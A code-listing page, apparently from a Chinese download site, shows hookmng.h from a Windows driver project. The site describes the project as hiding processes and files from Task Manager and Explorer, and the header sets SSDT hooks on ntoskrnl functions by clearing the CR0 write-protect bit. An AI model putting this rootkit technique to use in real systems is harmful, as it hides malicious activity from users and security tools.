hookmng.h

来自「实现了隐藏进程,使进程对任务管理器和进程查看器均不可见,使文件对资源管理器不可见」· C头文件代码 · 共 65 行

65 行

#if !defined(AFX_HOOKMNG_H__CC466B43_CEF2_4037_8D0C_630973995D56__INCLUDED_)
#define AFX_HOOKMNG_H__CC466B43_CEF2_4037_8D0C_630973995D56__INCLUDED_

#include "common.h"
#include "SingleMode.h"
#include "HookFactory.h"

class HookMng
{
private:
	std::vector<Hook> mHooksInfo;
	std::deque<Hook> mHooksDeque;
	SingleProcessorMode mSingleMode;
	
public:
	HookMng(){}
	~HookMng(){ClearHooks();}

	bool QueueHook(IN Hook& refHook);
	
	bool ApplyQueuedHooks();
	void CleanQueuedHooks();

	void ClearHooks();

	/*	Function that hooking ntoskrnl functions in SDT */
protected:
	void ExApplyQueuedHooks();
	
	template<class _Type> 
		bool ExSetHook(
		_Type& refObject,				// Object of specified _Type
		void (_Type::*FuncPtr)());	// Pointer to a method of specified _Type

};
template<class _Type> 
bool HookMng::ExSetHook(
			   _Type& refObject,				// Object of specified _Type
			   void (_Type::*FuncPtr)())	// Pointer to a method of specified _Type
{
	ULONG CR0Reg;
	mSingleMode.Enter();

	__asm
	{
		mov eax, cr0
			mov CR0Reg,eax			// save WP bit
			and eax,0xFFFEFFFF		// clear WP bit
			mov cr0, eax
	}

	// Calling a method of specified _Type
	(refObject.*FuncPtr)();

	__asm
	{
		mov eax, CR0Reg
			mov cr0, eax            // restore WP bit                    
	}

	mSingleMode.Exit();

	return true;
}
#endif // !defined(AFX_HOOKMNG_H__CC466B43_CEF2_4037_8D0C_630973995D56__INCLUDED_)

hookmng.h - 源码说明

本页面展示了「实现了隐藏进程,使进程对任务管理器和进程查看器均不可见,使文件对资源管理器不可见是驱动编程入门的好例子」中的 hookmng.h 源码文件，采用 C头文件编程语言编写，共 65 行代码。您可以在线阅读完整代码内容，也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫下载站收录了大量与进程相关的技术资源，包括源代码、技术文档、电路图等，是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C

搜索代码Ctrl + F

全屏模式F11

增大字号Ctrl + =

减小字号Ctrl + -

显示快捷键?